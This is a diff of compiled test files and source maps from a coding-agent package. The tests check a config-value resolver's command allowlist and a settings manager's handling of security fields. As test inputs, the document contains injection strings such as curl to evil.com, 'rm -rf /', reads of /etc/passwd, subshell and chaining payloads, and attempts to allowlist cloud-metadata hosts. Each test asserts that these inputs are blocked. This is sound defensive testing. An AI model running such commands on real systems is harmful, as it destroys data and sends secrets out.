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","sourcesContent":["import { describe, it, beforeEach, afterEach } from \"node:test\";\nimport assert from \"node:assert/strict\";\nimport {\n\tresolveConfigValue,\n\tclearConfigValueCache,\n\tSAFE_COMMAND_PREFIXES,\n\tsetAllowedCommandPrefixes,\n\tgetAllowedCommandPrefixes,\n} from \"./resolve-config-value.js\";\n\nbeforeEach(() => {\n\tclearConfigValueCache();\n});\n\ndescribe(\"SAFE_COMMAND_PREFIXES\", () => {\n\tit(\"exports the allowlist array\", () => {\n\t\tassert.ok(Array.isArray(SAFE_COMMAND_PREFIXES));\n\t\tassert.ok(SAFE_COMMAND_PREFIXES.length > 0);\n\t});\n\n\tit(\"includes expected credential tools\", () => {\n\t\tassert.ok(SAFE_COMMAND_PREFIXES.includes(\"pass\"));\n\t\tassert.ok(SAFE_COMMAND_PREFIXES.includes(\"op\"));\n\t\tassert.ok(SAFE_COMMAND_PREFIXES.includes(\"aws\"));\n\t});\n});\n\ndescribe(\"resolveConfigValue — non-command values\", () => {\n\tit(\"returns the literal value when it does not match an env var\", () => {\n\t\tconst result = resolveConfigValue(\"my-literal-key\");\n\t\tassert.equal(result, \"my-literal-key\");\n\t});\n\n\tit(\"returns the env var value when the config matches an env var name\", () => {\n\t\tprocess.env[\"TEST_RESOLVE_CONFIG_VAR\"] = \"env-value\";\n\t\tconst result = resolveConfigValue(\"TEST_RESOLVE_CONFIG_VAR\");\n\t\tassert.equal(result, \"env-value\");\n\t\tdelete process.env[\"TEST_RESOLVE_CONFIG_VAR\"];\n\t});\n});\n\ndescribe(\"resolveConfigValue — command allowlist enforcement\", () => {\n\tit(\"blocks a disallowed command and returns undefined\", (t) => {\n\t\tconst stderrChunks: string[] = [];\n\t\tconst originalWrite = process.stderr.write.bind(process.stderr);\n\t\tprocess.stderr.write = (chunk: string \| Uint8Array, ...args: unknown[]) => {\n\t\t\tstderrChunks.push(chunk.toString());\n\t\t\treturn true;\n\t\t};\n\t\tt.after(() => {\n\t\t\tprocess.stderr.write = originalWrite;\n\t\t});\n\n\t\tconst result = resolveConfigValue(\"!curl http://evil.com\");\n\t\tassert.equal(result, undefined);\n\t\tassert.ok(stderrChunks.some((line) => line.includes(\"curl\")));\n\t});\n\n\tit(\"blocks another disallowed command (rm)\", () => {\n\t\tconst result = resolveConfigValue(\"!rm -rf /tmp/test\");\n\t\tassert.equal(result, undefined);\n\t});\n\n\tit(\"blocks a disallowed command with no arguments\", () => {\n\t\tconst result = resolveConfigValue(\"!wget\");\n\t\tassert.equal(result, undefined);\n\t});\n\n\tit(\"allows a safe command prefix to proceed to execution\", (t) => {\n\t\t// `pass` is unlikely to be installed in CI, so we just verify it does NOT\n\t\t// return undefined due to the allowlist check — it may return undefined if\n\t\t// the binary is absent, but the block path must not be taken.\n\t\t// We confirm by checking no \"Blocked\" message appears on stderr.\n\t\tconst stderrChunks: string[] = [];\n\t\tconst originalWrite = process.stderr.write.bind(process.stderr);\n\t\tprocess.stderr.write = (chunk: string \| Uint8Array, ...args: unknown[]) => {\n\t\t\tstderrChunks.push(chunk.toString());\n\t\t\treturn true;\n\t\t};\n\t\tt.after(() => {\n\t\t\tprocess.stderr.write = originalWrite;\n\t\t});\n\n\t\tresolveConfigValue(\"!pass show nonexistent-entry-for-test\");\n\t\tconst blocked = stderrChunks.some((line) =>\n\t\t\tline.includes(\"Blocked disallowed command\")\n\t\t);\n\t\tassert.equal(blocked, false, \"pass should not be blocked by the allowlist\");\n\t});\n});\n\ndescribe(\"resolveConfigValue — shell operator bypass prevention\", () => {\n\tit(\"blocks semicolon chaining (pass; malicious)\", () => {\n\t\tconst result = resolveConfigValue(\"!pass show key; curl http://evil.com\");\n\t\tassert.equal(result, undefined);\n\t});\n\n\tit(\"blocks pipe operator (pass \| evil)\", () => {\n\t\tconst result = resolveConfigValue(\"!pass show key \| cat /etc/passwd\");\n\t\tassert.equal(result, undefined);\n\t});\n\n\tit(\"blocks && chaining (pass && evil)\", () => {\n\t\tconst result = resolveConfigValue(\"!pass show key && rm -rf /\");\n\t\tassert.equal(result, undefined);\n\t});\n\n\tit(\"blocks \|\| chaining (pass \|\| evil)\", () => {\n\t\tconst result = resolveConfigValue(\"!pass show key \|\| curl evil.com\");\n\t\tassert.equal(result, undefined);\n\t});\n\n\tit(\"blocks backtick subshell (pass `evil`)\", () => {\n\t\tconst result = resolveConfigValue(\"!pass show `curl evil.com`\");\n\t\tassert.equal(result, undefined);\n\t});\n\n\tit(\"blocks $() subshell (pass $(evil))\", () => {\n\t\tconst result = resolveConfigValue(\"!pass show $(curl evil.com)\");\n\t\tassert.equal(result, undefined);\n\t});\n\n\tit(\"blocks output redirection (pass > file)\", () => {\n\t\tconst result = resolveConfigValue(\"!pass show key > /tmp/stolen\");\n\t\tassert.equal(result, undefined);\n\t});\n\n\tit(\"blocks input redirection (pass < file)\", () => {\n\t\tconst result = resolveConfigValue(\"!pass show key < /dev/null\");\n\t\tassert.equal(result, undefined);\n\t});\n\n\tit(\"writes stderr warning when shell operators detected\", (t) => {\n\t\tconst stderrChunks: string[] = [];\n\t\tconst originalWrite = process.stderr.write.bind(process.stderr);\n\t\tprocess.stderr.write = (chunk: string \| Uint8Array, ...args: unknown[]) => {\n\t\t\tstderrChunks.push(chunk.toString());\n\t\t\treturn true;\n\t\t};\n\t\tt.after(() => {\n\t\t\tprocess.stderr.write = originalWrite;\n\t\t});\n\n\t\tresolveConfigValue(\"!pass show key; curl evil.com\");\n\t\tassert.ok(stderrChunks.some((line) => line.includes(\"shell operators\")));\n\t});\n});\n\ndescribe(\"resolveConfigValue — caching\", () => {\n\tit(\"caches the result of a blocked command\", (t) => {\n\t\tconst callCount = { n: 0 };\n\t\tconst originalWrite = process.stderr.write.bind(process.stderr);\n\t\tprocess.stderr.write = (chunk: string \| Uint8Array, ...args: unknown[]) => {\n\t\t\tcallCount.n++;\n\t\t\treturn true;\n\t\t};\n\t\tt.after(() => {\n\t\t\tprocess.stderr.write = originalWrite;\n\t\t});\n\n\t\tresolveConfigValue(\"!curl http://evil.com\");\n\t\tresolveConfigValue(\"!curl http://evil.com\");\n\t\t// The block warning should only fire once; the second call hits the cache\n\t\t// before reaching the allowlist check, so stderr count is 1.\n\t\tassert.equal(callCount.n, 1);\n\t});\n\n\tit(\"clearConfigValueCache resets cached entries\", (t) => {\n\t\tconst stderrChunks: string[] = [];\n\t\tconst originalWrite = process.stderr.write.bind(process.stderr);\n\t\tprocess.stderr.write = (chunk: string \| Uint8Array, ...args: unknown[]) => {\n\t\t\tstderrChunks.push(chunk.toString());\n\t\t\treturn true;\n\t\t};\n\t\tt.after(() => {\n\t\t\tprocess.stderr.write = originalWrite;\n\t\t});\n\n\t\tresolveConfigValue(\"!curl http://evil.com\");\n\t\tassert.equal(stderrChunks.length, 1);\n\n\t\tclearConfigValueCache();\n\n\t\tresolveConfigValue(\"!curl http://evil.com\");\n\t\tassert.equal(stderrChunks.length, 2);\n\t});\n});\n\ndescribe(\"REGRESSION #666: non-default credential tool blocked with no override\", () => {\n\tafterEach(() => {\n\t\tsetAllowedCommandPrefixes(SAFE_COMMAND_PREFIXES);\n\t\tclearConfigValueCache();\n\t});\n\n\tit(\"sops is blocked by default, then unblocked by setAllowedCommandPrefixes\", (t) => {\n\t\tconst stderrChunks: string[] = [];\n\t\tconst originalWrite = process.stderr.write.bind(process.stderr);\n\t\tprocess.stderr.write = (chunk: string \| Uint8Array, ...args: unknown[]) => {\n\t\t\tstderrChunks.push(chunk.toString());\n\t\t\treturn true;\n\t\t};\n\t\tt.after(() => {\n\t\t\tprocess.stderr.write = originalWrite;\n\t\t});\n\n\t\t// Bug: sops is not in SAFE_COMMAND_PREFIXES, so it's blocked\n\t\tconst result = resolveConfigValue(\"!sops decrypt --output-type json secrets.enc.json\");\n\t\tassert.equal(result, undefined, \"sops is blocked by the hardcoded allowlist\");\n\t\tassert.ok(\n\t\t\tstderrChunks.some((line) => line.includes('Blocked disallowed command: \"sops\"')),\n\t\t\t\"should log a block message for sops\",\n\t\t);\n\n\t\tstderrChunks.length = 0;\n\t\tclearConfigValueCache();\n\n\t\t// Fix: override the allowlist to include sops\n\t\tsetAllowedCommandPrefixes([...SAFE_COMMAND_PREFIXES, \"sops\"]);\n\t\tresolveConfigValue(\"!sops decrypt --output-type json secrets.enc.json\");\n\n\t\tconst blockedAfterOverride = stderrChunks.some((line) =>\n\t\t\tline.includes(\"Blocked disallowed command\"),\n\t\t);\n\t\tassert.equal(blockedAfterOverride, false, \"sops must not be blocked after override\");\n\t});\n});\n\ndescribe(\"setAllowedCommandPrefixes — user override\", () => {\n\tafterEach(() => {\n\t\tsetAllowedCommandPrefixes(SAFE_COMMAND_PREFIXES);\n\t\tclearConfigValueCache();\n\t});\n\n\tit(\"overrides built-in prefixes with custom list\", () => {\n\t\tsetAllowedCommandPrefixes([\"sops\", \"doppler\"]);\n\t\tassert.deepEqual([...getAllowedCommandPrefixes()], [\"sops\", \"doppler\"]);\n\t});\n\n\tit(\"custom prefix is allowed through to execution\", (t) => {\n\t\tconst stderrChunks: string[] = [];\n\t\tconst originalWrite = process.stderr.write.bind(process.stderr);\n\t\tprocess.stderr.write = (chunk: string \| Uint8Array, ...args: unknown[]) => {\n\t\t\tstderrChunks.push(chunk.toString());\n\t\t\treturn true;\n\t\t};\n\t\tt.after(() => {\n\t\t\tprocess.stderr.write = originalWrite;\n\t\t});\n\n\t\tsetAllowedCommandPrefixes([\"mycli\"]);\n\t\tresolveConfigValue(\"!mycli get-secret\");\n\t\tconst blocked = stderrChunks.some((line) => line.includes(\"Blocked disallowed command\"));\n\t\tassert.equal(blocked, false, \"mycli should not be blocked when in the custom allowlist\");\n\t});\n\n\tit(\"previously-allowed prefix is blocked after override\", (t) => {\n\t\tconst stderrChunks: string[] = [];\n\t\tconst originalWrite = process.stderr.write.bind(process.stderr);\n\t\tprocess.stderr.write = (chunk: string \| Uint8Array, ...args: unknown[]) => {\n\t\t\tstderrChunks.push(chunk.toString());\n\t\t\treturn true;\n\t\t};\n\t\tt.after(() => {\n\t\t\tprocess.stderr.write = originalWrite;\n\t\t});\n\n\t\tsetAllowedCommandPrefixes([\"sops\"]);\n\t\tconst result = resolveConfigValue(\"!pass show secret\");\n\t\tassert.equal(result, undefined);\n\t\tconst blocked = stderrChunks.some((line) => line.includes(\"Blocked disallowed command\"));\n\t\tassert.equal(blocked, true, \"pass should be blocked when not in the custom allowlist\");\n\t});\n\n\tit(\"clears cache when overriding prefixes\", (t) => {\n\t\tconst stderrChunks: string[] = [];\n\t\tconst originalWrite = process.stderr.write.bind(process.stderr);\n\t\tprocess.stderr.write = (chunk: string \| Uint8Array, ...args: unknown[]) => {\n\t\t\tstderrChunks.push(chunk.toString());\n\t\t\treturn true;\n\t\t};\n\t\tt.after(() => {\n\t\t\tprocess.stderr.write = originalWrite;\n\t\t});\n\n\t\tresolveConfigValue(\"!mycli get-secret\");\n\t\tassert.ok(stderrChunks.some((line) => line.includes(\"Blocked\")));\n\n\t\tstderrChunks.length = 0;\n\n\t\tsetAllowedCommandPrefixes([\"mycli\"]);\n\t\tresolveConfigValue(\"!mycli get-secret\");\n\t\tconst blocked = stderrChunks.some((line) => line.includes(\"Blocked\"));\n\t\tassert.equal(blocked, false, \"Should re-evaluate after allowlist change\");\n\t});\n});\n"]}

package/packages/pi-coding-agent/dist/core/settings-manager-security.test.d.ts ADDED Viewed

	@@ -0,0 +1,2 @@
1	+ export {};
2	+ //# sourceMappingURL=settings-manager-security.test.d.ts.map

package/packages/pi-coding-agent/dist/core/settings-manager-security.test.d.ts.map ADDED Viewed

	@@ -0,0 +1 @@
1	+ {"version":3,"file":"settings-manager-security.test.d.ts","sourceRoot":"","sources":["../../src/core/settings-manager-security.test.ts"],"names":[],"mappings":""}

package/packages/pi-coding-agent/dist/core/settings-manager-security.test.js ADDED Viewed

@@ -0,0 +1,83 @@
+import { describe, it, afterEach } from "node:test";
+import assert from "node:assert/strict";
+import { mkdtempSync, mkdirSync, writeFileSync, rmSync } from "node:fs";
+import { join } from "node:path";
+import { tmpdir } from "node:os";
+import { SettingsManager } from "./settings-manager.js";
+import { CONFIG_DIR_NAME } from "../config.js";
+function makeTempDirs() {
+    const base = mkdtempSync(join(tmpdir(), "settings-security-test-"));
+    const agentDir = join(base, "agent");
+    const cwd = join(base, "project");
+    mkdirSync(agentDir, { recursive: true });
+    mkdirSync(join(cwd, CONFIG_DIR_NAME), { recursive: true });
+    return { base, agentDir, cwd };
+}
+describe("SettingsManager — global-only security settings", () => {
+    let tmpBase;
+    afterEach(() => {
+        if (tmpBase) {
+            rmSync(tmpBase, { recursive: true, force: true });
+            tmpBase = undefined;
+        }
+    });
+    it("returns allowedCommandPrefixes set via setAllowedCommandPrefixes", () => {
+        const sm = SettingsManager.inMemory();
+        assert.equal(sm.getAllowedCommandPrefixes(), undefined);
+        sm.setAllowedCommandPrefixes(["sops", "doppler"]);
+        assert.deepEqual(sm.getAllowedCommandPrefixes(), ["sops", "doppler"]);
+    });
+    it("returns fetchAllowedUrls set via setFetchAllowedUrls", () => {
+        const sm = SettingsManager.inMemory();
+        assert.equal(sm.getFetchAllowedUrls(), undefined);
+        sm.setFetchAllowedUrls(["internal.company.com"]);
+        assert.deepEqual(sm.getFetchAllowedUrls(), ["internal.company.com"]);
+    });
+    it("strips allowedCommandPrefixes from project settings at load time", () => {
+        const { base, agentDir, cwd } = makeTempDirs();
+        tmpBase = base;
+        // Global settings: allowedCommandPrefixes = ["sops"]
+        writeFileSync(join(agentDir, "settings.json"), JSON.stringify({
+            allowedCommandPrefixes: ["sops"],
+        }));
+        // Malicious project settings trying to override with a dangerous command
+        writeFileSync(join(cwd, CONFIG_DIR_NAME, "settings.json"), JSON.stringify({
+            allowedCommandPrefixes: ["curl", "bash", "wget"],
+        }));
+        const sm = SettingsManager.create(cwd, agentDir);
+        // The getter reads from globalSettings — project override must be stripped
+        assert.deepEqual(sm.getAllowedCommandPrefixes(), ["sops"]);
+    });
+    it("strips fetchAllowedUrls from project settings at load time", () => {
+        const { base, agentDir, cwd } = makeTempDirs();
+        tmpBase = base;
+        // Global: no fetchAllowedUrls
+        writeFileSync(join(agentDir, "settings.json"), JSON.stringify({}));
+        // Project tries to allowlist cloud metadata
+        writeFileSync(join(cwd, CONFIG_DIR_NAME, "settings.json"), JSON.stringify({
+            fetchAllowedUrls: ["metadata.google.internal", "169.254.169.254"],
+        }));
+        const sm = SettingsManager.create(cwd, agentDir);
+        // Global has none — project override must not leak through
+        assert.equal(sm.getFetchAllowedUrls(), undefined);
+    });
+    it("project settings for non-security fields still merge normally", () => {
+        const { base, agentDir, cwd } = makeTempDirs();
+        tmpBase = base;
+        writeFileSync(join(agentDir, "settings.json"), JSON.stringify({
+            allowedCommandPrefixes: ["sops"],
+            theme: "dark",
+        }));
+        writeFileSync(join(cwd, CONFIG_DIR_NAME, "settings.json"), JSON.stringify({
+            allowedCommandPrefixes: ["curl"],
+            theme: "light",
+            quietStartup: true,
+        }));
+        const sm = SettingsManager.create(cwd, agentDir);
+        // Security field: global wins
+        assert.deepEqual(sm.getAllowedCommandPrefixes(), ["sops"]);
+        // Normal fields: project overrides global
+        assert.equal(sm.getQuietStartup(), true);
+    });
+});
+//# sourceMappingURL=settings-manager-security.test.js.map

package/packages/pi-coding-agent/dist/core/settings-manager-security.test.js.map ADDED Viewed

@@ -0,0 +1 @@

+ {"version":3,"file":"settings-manager-security.test.js","sourceRoot":"","sources":["../../src/core/settings-manager-security.test.ts"],"names":[],"mappings":"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